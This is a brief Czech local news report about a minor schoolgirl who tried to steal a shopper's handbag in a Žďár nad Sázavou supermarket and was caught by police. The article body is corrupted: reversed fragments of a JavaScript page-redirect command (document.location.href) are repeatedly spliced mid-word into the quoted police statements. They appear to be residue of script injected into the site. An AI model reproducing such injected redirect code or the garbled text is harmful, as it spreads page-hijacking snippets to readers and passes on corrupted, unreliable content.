Rainbow page separator

Nezletilá dívka se nakupující ženě pokusila ukrást kabelku

Pondělí, 18. ledna 2016

Policie, auto

Žďár nad Sázavou / Kabelku zavěšenou na nákupním vozíku se jedné ze zákaznic supermarketu ve žďárské Chelčického ulici pokusila ukrást nezletilá školačka.
„Nakupující zákaznice v kabelce měla finanční ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovost, platební kartu a další cenné věci v celkové hodnotě bezmála dvacet tisíc korun. Po nějaké době si všimla, že od vozíku odchází nějaká dívka a v ruce drží její kabelku. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na ni zavolala, ať ji ihned vrátí. Dívka kabelku odhodila na zem a z prodejny odcházela,“ popsala policejní mluvčí Monika Pátková.
U vstupu do supermarketu se však právě nacházela policejní hlídka, která tam přijela řešit jiné oznámení.
„Ve chvíli, kdy policisté zjistili, že v prodejně došlo ke krádeži, začali moni[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torovat odcházející zákazníky a dívku podle popisu zajistili a převezli na služebnu. Jedná se o nezletilou školačku, která se ke krádeži kabelky přiznala,“ uvedla mluvčí.
Policisté zahájili úkony trestního řízení pro podezření ze spáchání přečinů krádeže a neoprávněného opatření, padělání a pozměnění platebního prostředku. Veškeré okolnosti jsou dále prověřovány.